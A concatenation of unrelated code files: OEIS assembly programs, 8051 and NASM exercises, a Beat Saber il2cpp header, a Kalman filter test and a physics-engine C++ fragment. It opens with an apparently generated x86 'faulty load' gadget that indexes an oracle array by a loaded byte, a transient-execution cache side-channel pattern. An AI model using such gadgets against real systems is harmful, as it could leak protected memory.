lea addresses_WC_ht+0x17f91, %r12
nop
nop
nop
nop
nop
and %r10, %r10
movw $0x6162, (%r12)
nop
cmp $26538, %rcx
pop %rsi
pop %rdi
pop %rcx
pop %rbx
pop %r9
pop %r8
pop %r12
pop %r10
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r14
push %r9
push %rax
push %rbx
push %rsi
// Store
lea addresses_UC+0x8401, %r11
add %r14, %r14
mov $0x5152535455565758, %rsi
movq %rsi, (%r11)
nop
nop
sub %rax, %rax
// Faulty Load
lea addresses_PSE+0x1b29, %rbx
xor $13333, %r9
mov (%rbx), %si
lea oracles, %r9
and $0xff, %rsi
shlq $12, %rsi
mov (%r9,%rsi,1), %rsi
pop %rsi
pop %rbx
pop %rax
pop %r9
pop %r14
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_PSE', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_UC', 'size': 8, 'AVXalign': False, 'NT': False, 'congruent': 3, 'same': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_PSE', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 0, 'same': True}}
<gen_prepare_buffer>
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 0, 'same': False}, 'dst': {'type': 'addresses_normal_ht', 'congruent': 0, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 6, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 6, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_normal_ht', 'congruent': 5, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 0, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_normal_ht', 'size': 16, 'AVXalign': True, 'NT': False, 'congruent': 3, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'size': 4, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_UC_ht', 'congruent': 10, 'same': False}, 'dst': {'type': 'addresses_UC_ht', 'congruent': 9, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 2, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_D_ht', 'congruent': 8, 'same': False}, 'dst': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}}
{'OP': 'LOAD', 'src': {'type': 'addresses_WT_ht', 'size': 16, 'AVXalign': False, 'NT': False, 'congruent': 1, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WT_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 10, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_WC_ht', 'congruent': 9, 'same': False}, 'dst': {'type': 'addresses_WC_ht', 'congruent': 5, 'same': False}}
{'OP': 'REPM', 'src': {'type': 'addresses_D_ht', 'congruent': 7, 'same': False}, 'dst': {'type': 'addresses_A_ht', 'congruent': 6, 'same': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_WC_ht', 'size': 2, 'AVXalign': False, 'NT': False, 'congruent': 2, 'same': False}}
{'33': 1528}
33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33
*/
|
;Program to accept a two-digit number and print it
.model small
.stack 100h
.data
msg db 'Enter the two digit number : $'
.code
main proc
mov ax,@data
mov ds,ax
mov dx,offset msg
mov ah,9
int 21h
mov ah,1
int 21h
mov bl,al
mov ah,1
int 21h
mov cl,al
mov dl,10
mov ah,2
int 21h
mov dl,13
mov ah,2
int 21h
mov dl,bl
mov ah,2
int 21h
mov dl,cl
mov ah,2
int 21h
mov ah,4ch
int 21h
main endp
end main |
; A089821: Number of subsets of {1,.., n} containing exactly one prime.
; 0,2,4,8,12,24,32,64,128,256,320,640,768,1536,3072,6144,7168,14336,16384,32768,65536,131072,147456,294912,589824,1179648,2359296,4718592,5242880,10485760,11534336,23068672,46137344,92274688,184549376,369098752,402653184
mov $4,$0
add $4,1
mov $0,$4
sub $4,2
mov $3,$4
cal $0,230980 ; Number of primes <= n, starting at n=0.
mov $1,$0
mov $2,$0
sub $2,2
sub $3,$2
lpb $3,1
mul $1,2
sub $3,1
lpe
|
; A314706: Coordination sequence Gal.6.130.5 where G.u.t.v denotes the coordination sequence for a vertex of type v in tiling number t in the Galebach list of u-uniform tilings.
; 1,5,9,13,18,22,26,30,34,39,43,47,52,57,61,65,70,74,78,82,86,91,95,99,104,109,113,117,122,126,130,134,138,143,147,151,156,161,165,169,174,178,182,186,190,195,199,203,208,213
mov $4,$0
add $4,1
mov $7,$0
lpb $4
mov $0,$7
sub $4,1
sub $0,$4
add $3,1
lpb $3
sub $3,1
mov $5,8
lpb $0
sub $0,1
add $2,$5
add $2,2
div $2,3
gcd $2,2
add $2,2
add $5,$0
lpe
mov $5,$2
add $5,2
lpe
mov $6,$5
sub $6,1
add $1,$6
lpe
|
;16 ALPHA END TO END NON-CONTINUOUS CRAWLING DISPLAY
;10/08/2007
;CHECKED AND TESTED ON AT89C51
;PROGRAM RUN--------SUCCESS
;CHANGE CONTROL : 04-09-2010 LOGIC CHANGED AGAINST USE OF DPTR
;
ORG 0000H ; P1.1-RS
SJMP 0030H ; P1.2-R/W
ORG 0030H ; P1.3-EN
; PORT2 FOR DATA OUT
START: CLR A
MOV P1,A
MOV P2,A
MOV P3,A
INIT: MOV A,#38H
LCALL COMMAND
MOV A,#0CH
LCALL COMMAND
MOV A,#06H
LCALL COMMAND
MOV A,#01H
LCALL COMMAND
MOV DPTR,#CNST
RWRITE: LCALL CLEAR
CLR A
MOV R1,A
MOV R0,#0CFH
MOV R2,A
CYCLE:
MOV A,R0
LCALL COMMAND
INC R2
MOV R1,#00H
DEC R0
CLR A
LOOP: MOV A,R1
MOVC A,@A+DPTR
LCALL DISPLAY
INC R1
MOV A,R1
CJNE A,02H,LOOP
LCALL DELAY
CJNE R2,#10H,CYCLE
SJMP RWRITE
HERE: SJMP HERE
COMMAND:LCALL READY
CLR P1.2
CLR P1.1
MOV P2,A
SETB P1.3
NOP
CLR P1.3
RET
READY: SETB P2.7
CLR P1.1
SETB P1.2
BUSY: CLR P1.3
SETB P1.3
JB P2.7,BUSY
NOP
CLR P1.3
RET
DISPLAY:LCALL READY
CLR P1.2
SETB P1.1
MOV P2,A
SETB P1.3
NOP
CLR P1.3
RET
DELAY: MOV R7,#04H
WAITC: MOV R6,#0FFH
WAITB: MOV R5,#0FFH
WAITA: DJNZ R5,WAITA
DJNZ R6,WAITB
DJNZ R7,WAITC
RET
CLEAR: MOV A,#01H
LCALL COMMAND
RET
ORG 0F80H
CNST: DB 'wings of fire '
END |
; A027608: Expansion of 1/((1-x)*(1-2x)^4).
; 1,9,49,209,769,2561,7937,23297,65537,178177,471041,1216513,3080193,7667713,18808833,45547521,109051905,258473985,607125505,1414529025,3271557121,7516192769,17163091969,38973472769,88046829569,197971148801,443186937857,988110913537,2194728288257,4857608011777,10715943403521,23566485553153,51677046505473,113009179492353,246496763052033,536355515924481,1164382813814785,2522279674118145,5452478162141185
lpb $0,1
mov $2,$0
sub $0,1
mul $1,2
add $2,3
bin $2,3
add $1,$2
lpe
div $1,4
mul $1,8
add $1,1
|
%include "io.inc"
section .data
%define ARRAY_LEN 7
input dd 122, 184, 199, 242, 263, 845, 911
output times ARRAY_LEN dd 0
section .text
global CMAIN
CMAIN:
; TODO push the elements of the array on the stack
; TODO retrieve the elements (pop) from the stack into the output array
mov ecx, ARRAY_LEN
mov eax, 0
reverse_array:
push dword [input + (ecx - 1) * 4]
pop dword [output + eax * 4]
inc eax
loop reverse_array
PRINT_STRING "Reversed array:"
NEWLINE
xor ecx, ecx
print_array:
PRINT_UDEC 4, [output + 4 * ecx]
NEWLINE
inc ecx
cmp ecx, ARRAY_LEN
jb print_array
xor eax, eax
ret
|
// Autogenerated from CppHeaderCreator
// Created by Sc2ad
// =========================================================================
#pragma once
// Begin includes
#include "beatsaber-hook/shared/utils/typedefs.h"
#include "beatsaber-hook/shared/utils/byref.hpp"
// Including type: UnityEngine.MonoBehaviour
#include "UnityEngine/MonoBehaviour.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-properties.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-fields.hpp"
#include "beatsaber-hook/shared/utils/utils.h"
// Completed includes
// Begin forward declares
// Forward declaring namespace: VROSC
namespace VROSC {
// Forward declaring type: TutorialInputDevice
class TutorialInputDevice;
// Forward declaring type: InputDevice
class InputDevice;
// Forward declaring type: HandType
struct HandType;
// Forward declaring type: TriggerButton
struct TriggerButton;
}
// Forward declaring namespace: UnityEngine
namespace UnityEngine {
// Forward declaring type: Color
struct Color;
}
// Completed forward declares
// Type namespace: VROSC
namespace VROSC {
// Forward declaring type: TutorialInputDeviceManager
class TutorialInputDeviceManager;
}
#include "beatsaber-hook/shared/utils/il2cpp-type-check.hpp"
NEED_NO_BOX(::VROSC::TutorialInputDeviceManager);
DEFINE_IL2CPP_ARG_TYPE(::VROSC::TutorialInputDeviceManager*, "VROSC", "TutorialInputDeviceManager");
// Type namespace: VROSC
namespace VROSC {
// Size: 0x28
#pragma pack(push, 1)
// Autogenerated type: VROSC.TutorialInputDeviceManager
// [TokenAttribute] Offset: FFFFFFFF
class TutorialInputDeviceManager : public ::UnityEngine::MonoBehaviour {
public:
public:
// private VROSC.TutorialInputDevice _left
// Size: 0x8
// Offset: 0x18
::VROSC::TutorialInputDevice* left;
// Field size check
static_assert(sizeof(::VROSC::TutorialInputDevice*) == 0x8);
// private VROSC.TutorialInputDevice _right
// Size: 0x8
// Offset: 0x20
::VROSC::TutorialInputDevice* right;
// Field size check
static_assert(sizeof(::VROSC::TutorialInputDevice*) == 0x8);
public:
// Deleting conversion operator: operator ::System::IntPtr
constexpr operator ::System::IntPtr() const noexcept = delete;
// Get instance field reference: private VROSC.TutorialInputDevice _left
[[deprecated("Use field access instead!")]] ::VROSC::TutorialInputDevice*& dyn__left();
// Get instance field reference: private VROSC.TutorialInputDevice _right
[[deprecated("Use field access instead!")]] ::VROSC::TutorialInputDevice*& dyn__right();
// public System.Void .ctor()
// Offset: 0xA2FFEC
template<::il2cpp_utils::CreationType creationType = ::il2cpp_utils::CreationType::Temporary>
static TutorialInputDeviceManager* New_ctor() {
static auto ___internal__logger = ::Logger::get().WithContext("::VROSC::TutorialInputDeviceManager::.ctor");
return THROW_UNLESS((::il2cpp_utils::New<TutorialInputDeviceManager*, creationType>()));
}
// public System.Void Setup(VROSC.InputDevice left, VROSC.InputDevice right)
// Offset: 0xA2FCE0
void Setup(::VROSC::InputDevice* left, ::VROSC::InputDevice* right);
// public System.Void StartButtonBlinking(VROSC.HandType hand, VROSC.TriggerButton trigger, UnityEngine.Color color)
// Offset: 0xA2FD0C
void StartButtonBlinking(::VROSC::HandType hand, ::VROSC::TriggerButton trigger, ::UnityEngine::Color color);
// public System.Void StopButtonBlinking(VROSC.HandType hand, VROSC.TriggerButton trigger, System.Single fadeTime)
// Offset: 0xA2FEEC
void StopButtonBlinking(::VROSC::HandType hand, ::VROSC::TriggerButton trigger, float fadeTime);
// public System.Void StopAllBlinking(VROSC.HandType hand, System.Single fadeTime)
// Offset: 0xA2FF78
void StopAllBlinking(::VROSC::HandType hand, float fadeTime);
// private System.Boolean IsLeftValid(VROSC.HandType hand)
// Offset: 0xA2FDC8
bool IsLeftValid(::VROSC::HandType hand);
// private System.Boolean IsRightValid(VROSC.HandType hand)
// Offset: 0xA2FE58
bool IsRightValid(::VROSC::HandType hand);
}; // VROSC.TutorialInputDeviceManager
#pragma pack(pop)
static check_size<sizeof(TutorialInputDeviceManager), 32 + sizeof(::VROSC::TutorialInputDevice*)> __VROSC_TutorialInputDeviceManagerSizeCheck;
static_assert(sizeof(TutorialInputDeviceManager) == 0x28);
}
#include "beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::New_ctor
// Il2CppName: .ctor
// Cannot get method pointer of value based method overload from template for constructor!
// Try using FindMethod instead!
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::Setup
// Il2CppName: Setup
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (VROSC::TutorialInputDeviceManager::*)(::VROSC::InputDevice*, ::VROSC::InputDevice*)>(&VROSC::TutorialInputDeviceManager::Setup)> {
static const MethodInfo* get() {
static auto* left = &::il2cpp_utils::GetClassFromName("VROSC", "InputDevice")->byval_arg;
static auto* right = &::il2cpp_utils::GetClassFromName("VROSC", "InputDevice")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "Setup", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{left, right});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::StartButtonBlinking
// Il2CppName: StartButtonBlinking
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType, ::VROSC::TriggerButton, ::UnityEngine::Color)>(&VROSC::TutorialInputDeviceManager::StartButtonBlinking)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
static auto* trigger = &::il2cpp_utils::GetClassFromName("VROSC", "TriggerButton")->byval_arg;
static auto* color = &::il2cpp_utils::GetClassFromName("UnityEngine", "Color")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "StartButtonBlinking", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand, trigger, color});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::StopButtonBlinking
// Il2CppName: StopButtonBlinking
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType, ::VROSC::TriggerButton, float)>(&VROSC::TutorialInputDeviceManager::StopButtonBlinking)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
static auto* trigger = &::il2cpp_utils::GetClassFromName("VROSC", "TriggerButton")->byval_arg;
static auto* fadeTime = &::il2cpp_utils::GetClassFromName("System", "Single")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "StopButtonBlinking", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand, trigger, fadeTime});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::StopAllBlinking
// Il2CppName: StopAllBlinking
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType, float)>(&VROSC::TutorialInputDeviceManager::StopAllBlinking)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
static auto* fadeTime = &::il2cpp_utils::GetClassFromName("System", "Single")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "StopAllBlinking", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand, fadeTime});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::IsLeftValid
// Il2CppName: IsLeftValid
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<bool (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType)>(&VROSC::TutorialInputDeviceManager::IsLeftValid)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "IsLeftValid", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand});
}
};
// Writing MetadataGetter for method: VROSC::TutorialInputDeviceManager::IsRightValid
// Il2CppName: IsRightValid
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<bool (VROSC::TutorialInputDeviceManager::*)(::VROSC::HandType)>(&VROSC::TutorialInputDeviceManager::IsRightValid)> {
static const MethodInfo* get() {
static auto* hand = &::il2cpp_utils::GetClassFromName("VROSC", "HandType")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(VROSC::TutorialInputDeviceManager*), "IsRightValid", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{hand});
}
};
|
.text "Hello World"
ldca $a .text
pushi $a ;; push the address on the stack, so that print_string can use it
call :print_string ;; call the print_string subroutine
jmp :exit ; exit out of the program
printi #11 ; shouldn't get invoked, because we are jumping to the :exit label
;;
;; Prints the supplied string to sysout
;;
;; input:
;; <address> to string constant, retreived from top of the stack
;; output:
;; <void>
;;
:print_string
popi $a ;; stores the address of the string constant
:print_loop
ifb &$a #0 ;; loops until the value at address $a = 0; strings are null terminated
jmp :print_end_loop
printc &$a ;; prints out the ASCII byte character
addi $a #1 ;; increments to the next character byte
jmp :print_loop
:print_end_loop
ret ;; Stores return $pc in $r register, RET sets the $pc to value of $r
:exit |
; A322029: Denominator of least value of the squared diameters of the enclosing circles of all strictly convex lattice n-gons with minimal area given by A070911. Numerators are A321693.
; 1,1,9,1,1,1,49,1,1,1,1,1,1,1,169,1,1,1,1,1,1,1,1,1
mov $3,2
mov $7,$0
lpb $3,1
mov $0,$7
sub $3,1
add $0,$3
trn $0,1
add $0,2
log $0,2
mov $2,$3
mov $5,$0
add $5,4
mov $6,$5
bin $6,6
mov $4,$6
lpb $2,1
mov $1,$4
sub $2,1
lpe
lpe
lpb $7,1
sub $1,$4
mov $7,0
lpe
mul $1,8
add $1,1
|
/* 卡尔曼滤波器算法测试 */
#include "KalmanFilterTest.h"
double frand()
{
return 2 * ((rand() / (double)RAND_MAX) - 0.5);//随机噪声
}
void KalmanFiterTest()
{
float x_last = 0;
float p_last = 0.02;
float Q = 0.018;
float R = 0.542;
float kg;
float x_mid;
float x_now;
float p_mid;
float p_now;
float z_real = 0.56;
float z_measure;
float summerror_kalman = 0;
float summerror_measure = 0;
int i;
x_last = z_real + frand()*0.03;
x_mid = x_last;
for (i = 0; i < 20;i++)
{
x_mid = x_last;
p_mid = p_last + Q;
kg = p_mid / (p_mid + R);
z_measure = z_real + frand()*0.03;//测量值
x_now = x_mid + kg*(z_measure - x_mid);//估计出的最有值
p_now = (1 - kg)*p_mid;//最优值对应的协方差
printf("Real position:%6.3f\n", z_real);
printf("Measure position:%6.3f [diff:%.3f]\n", z_measure, fabs(z_real - z_measure));
printf("Kalman position: %6.3f [diff:%.3f]\n", x_now, fabs(z_real - x_now));
printf("\n\n");
summerror_kalman += fabs(z_real - x_now);
summerror_measure += fabs(z_real - z_measure);
p_last = p_now;
x_last = x_now;
}
printf("总体测量误差 :%f\n", summerror_measure);
printf("总体卡尔曼滤波误差:%f\n", summerror_kalman);
printf("卡尔曼误差所占比例:%d%%\n", 100 - (int)((summerror_kalman / summerror_measure) * 100));
}
|
wordsize 8
;this is the code used to make rom3 used in simu3_tb. This should be compiled with reflet-masm.
;This program run a debug instruction wil level 2 each time a bit in the GPIO is flipped
;The base address for the GPIO in 0x80 and the address for the exti is 0x88
label start
;configuring the GPIO
set+ 132 ;address of the GPIO interupt controll
cpy R1
set 0
not WR ;settinf 0xFF to enable all interrupts
cpy R2
str R1
set 1
add R1
cpy R1
read R2
str R1
set 1
add R1
cpy R1
read R2
str R1
set 1
add R1
cpy R1
read R2
str R1
;configuring the interrupt manager
set 1
add R1
cpy R1
set 1
str R1
add R1
cpy R1
set 2
str R1
set 1
add R1
cpy R1 ;setting the status register in R1
;configuring the interruption on the cpu side
set 1
add R1
cpy R1 ;storing the value of the exti status register in R1
setlab intRoutine
setint 2
set+ 32 ;enable the int2 flag
cpy SR
;infinite loop
setlab loop
label loop
slp
slp
jmp
quit ;unreachable
label intRoutine
cpy R2 ;saving the value of the WR
debug
set 0
str R1 ;clearing the status register of the interupt manager
read R2
retint
|
// Copyright (c) Facebook, Inc. and its affiliates.
// This source code is licensed under the MIT license found in the
// LICENSE file in the root directory of this source tree.
// Construction code adapted from Bullet3/examples/
#include "BulletArticulatedObject.h"
#include "BulletDynamics/Featherstone/btMultiBodyLinkCollider.h"
#include "BulletPhysicsManager.h"
#include "BulletURDFImporter.h"
#include "esp/scene/SceneNode.h"
namespace Mn = Magnum;
namespace Cr = Corrade;
namespace esp {
namespace physics {
// set node state from btTransform
// TODO: this should probably be moved
static void setRotationScalingFromBulletTransform(const btTransform& trans,
scene::SceneNode* node) {
Mn::Matrix4 converted{trans};
node->setRotation(Mn::Quaternion::fromMatrix(converted.rotation()));
node->setTranslation(converted.translation());
}
///////////////////////////////////
// Class functions
///////////////////////////////////
BulletArticulatedObject::~BulletArticulatedObject() {
// ESP_DEBUG() << "deconstructing ~BulletArticulatedObject";
if (objectMotionType_ == MotionType::DYNAMIC) {
// KINEMATIC and STATIC objects have already been removed from the world.
bWorld_->removeMultiBody(btMultiBody_.get());
}
// remove link collision objects from world
for (int colIx = 0; colIx < btMultiBody_->getNumLinks(); ++colIx) {
auto* linkCollider = btMultiBody_->getLinkCollider(colIx);
bWorld_->removeCollisionObject(linkCollider);
collisionObjToObjIds_->erase(linkCollider);
delete linkCollider;
}
// remove fixed base rigid body
if (bFixedObjectRigidBody_) {
bWorld_->removeRigidBody(bFixedObjectRigidBody_.get());
collisionObjToObjIds_->erase(bFixedObjectRigidBody_.get());
bFixedObjectRigidBody_ = nullptr;
bFixedObjectShape_ = nullptr;
}
// remove base collider
auto* baseCollider = btMultiBody_->getBaseCollider();
bWorld_->btCollisionWorld::removeCollisionObject(baseCollider);
collisionObjToObjIds_->erase(baseCollider);
delete baseCollider;
// remove motors from the world
for (auto& motorId : getExistingJointMotors()) {
BulletArticulatedObject::removeJointMotor(motorId.first);
}
// remove joint limit constraints
for (auto& jlIter : jointLimitConstraints) {
bWorld_->removeMultiBodyConstraint(jlIter.second.con);
delete jlIter.second.con;
}
}
void BulletArticulatedObject::initializeFromURDF(
URDFImporter& urdfImporter,
const Mn::Matrix4& worldTransform,
scene::SceneNode* physicsNode) {
Mn::Matrix4 rootTransformInWorldSpace{worldTransform};
BulletURDFImporter& u2b = *(static_cast<BulletURDFImporter*>(&urdfImporter));
auto urdfModel = u2b.getModel();
int urdfLinkIndex = u2b.getRootLinkIndex();
// int rootIndex = u2b.getRootLinkIndex();
// NOTE: recursive path only
u2b.convertURDF2BulletInternal(urdfLinkIndex, rootTransformInWorldSpace,
bWorld_.get(), linkCompoundShapes_,
linkChildShapes_);
if (u2b.cache->m_bulletMultiBody) {
btMultiBody* mb = u2b.cache->m_bulletMultiBody;
jointLimitConstraints = u2b.cache->m_jointLimitConstraints;
mb->setHasSelfCollision((u2b.flags & CUF_USE_SELF_COLLISION) !=
0); // NOTE: default no
mb->finalizeMultiDof();
btTransform localInertialFrameRoot =
u2b.cache->m_urdfLinkLocalInertialFrames[urdfLinkIndex];
{
mb->setBaseWorldTransform(btTransform(rootTransformInWorldSpace) *
localInertialFrameRoot);
}
{
btAlignedObjectArray<btQuaternion> scratch_q;
btAlignedObjectArray<btVector3> scratch_m;
mb->forwardKinematics(scratch_q, scratch_m);
mb->updateCollisionObjectWorldTransforms(scratch_q, scratch_m);
}
btMultiBody_.reset(
mb); // take ownership of the object in the URDFImporter cache
bWorld_->addMultiBody(btMultiBody_.get());
btMultiBody_->setCanSleep(true);
// construct separate fixed base rigid object proxy for marked links
constructStaticRigidBaseObject();
// create the BulletArticulatedLinks
for (size_t urdfLinkIx = 0;
urdfLinkIx < urdfImporter.getModel()->m_links.size(); ++urdfLinkIx) {
int bulletLinkIx =
u2b.cache->m_urdfLinkIndices2BulletLinkIndices[urdfLinkIx];
auto urdfLink = u2b.getModel()->m_links.at(
u2b.getModel()->m_linkIndicesToNames[urdfLinkIx]);
ArticulatedLink* linkObject = nullptr;
if (bulletLinkIx >= 0) {
links_[bulletLinkIx] = std::make_unique<BulletArticulatedLink>(
&physicsNode->createChild(), resMgr_, bWorld_, bulletLinkIx,
collisionObjToObjIds_);
linkObject = links_[bulletLinkIx].get();
linkObject->linkJointName = urdfLink->m_parentJoint.lock()->m_name;
} else {
if (!baseLink_) {
baseLink_ = std::make_unique<BulletArticulatedLink>(
&node().createChild(), resMgr_, bWorld_, bulletLinkIx,
collisionObjToObjIds_);
}
linkObject = baseLink_.get();
}
linkObject->linkName = urdfLink->m_name;
linkObject->node().setType(esp::scene::SceneNodeType::OBJECT);
}
// Build damping motors
for (int linkIx = 0; linkIx < btMultiBody_->getNumLinks(); ++linkIx) {
btMultibodyLink& link = btMultiBody_->getLink(linkIx);
JointMotorSettings settings;
settings.maxImpulse = double(link.m_jointDamping);
if (supportsSingleDofJointMotor(linkIx)) {
settings.motorType = JointMotorType::SingleDof;
createJointMotor(linkIx, settings);
} else if (link.m_jointType == btMultibodyLink::eSpherical) {
settings.motorType = JointMotorType::Spherical;
createJointMotor(linkIx, settings);
}
}
// set user config attributes from model.
setUserAttributes(urdfModel->getUserConfiguration());
// in case the base transform is not zero by default
syncPose();
}
}
void BulletArticulatedObject::constructStaticRigidBaseObject() {
// start explicitly with base collider
btCollisionObject* col = btMultiBody_->getBaseCollider();
btTransform tr;
tr.setIdentity();
for (int m = -1; m < btMultiBody_->getNumLinks(); ++m) {
if (m >= 0) {
